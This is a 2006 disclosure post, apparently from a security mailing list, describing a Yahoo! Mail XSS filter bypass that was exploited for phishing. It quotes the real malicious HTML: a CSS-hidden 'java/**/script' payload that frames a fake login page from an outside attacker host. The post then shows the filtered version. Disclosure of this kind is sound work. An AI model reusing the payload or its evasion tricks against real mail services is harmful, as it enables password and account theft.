Yahoo! Mail XSS vulnerability

Description:

Yahoo! Mail is a very insecure and free Web Mail
service. It allows HTML messages but it has filters to
avoid malicius script being executed on users
browsers. On 17 April 2006 I received a message that
when viewed it redirected to a fake Yahoo! Mail login
web page, I could realize about this because a strange
domain was displayed on IE status bar.
When looking at the HTML code I found out that the
message was:

 ...Message text ...<BR><BR><a target="_blank"   
href="www.blabla23.com>"style="background:url\(java/**/script:document.write('<frameset
cols=100% rows=100% border=0
frameboarder=0framespacing=0><frame frameborder=0
src=http://w00tynetwork.com/x/></frameset>'))"></a><p>

You can see that the attacker used some tricks to
bypass filters, but we can't know all the tricks the
attacker used because some chars were removed or
replaced by the filter. That script loaded a fake
Yahoo! Mail login web page in order to steal
passwords.

Yahoo! was contacted and they responded that the issue
was going to be fixed, after that I haven't hear any
news about them. It seems that the issue was fixed
because now the same message is displayed as:

  ...Message text ...<BR><BR><a target="_blank"   
href="www.blabla23.com>"style="background:url\(_java/**/script:document.write('<xframeset
cols=100% rows=100% border=0
frameboarder=0framespacing=0><xframe frameborder=0
src=http://w00tynetwork.com/x/></frameset>'))"></a><p>

Now filters were improved, whenever the word
javascript appears a "_" is appended at the begining,
and a "x" is appended at the begining of dangerous
HTML tags.

Again Yahoo! didn't released any advisory nor
contacted customers about this issue. 
This issue was exploited for long time by malicious
people for stealing passwords and cookies in order to
compromise Yahoo! Mail users accounts, so it's very
important that Yahoo! Mail users change their
passwords just in case their accounts were
compromised.



Cesar.


__________________________________________________
Do You Yahoo!?
Tired of spam?  Yahoo! Mail has the best spam
protection around 
http://mail.yahoo.com 

__________________________________________________
Do You Yahoo!?
Tired of spam?  Yahoo! Mail has the best spam protection around 
http://mail.yahoo.com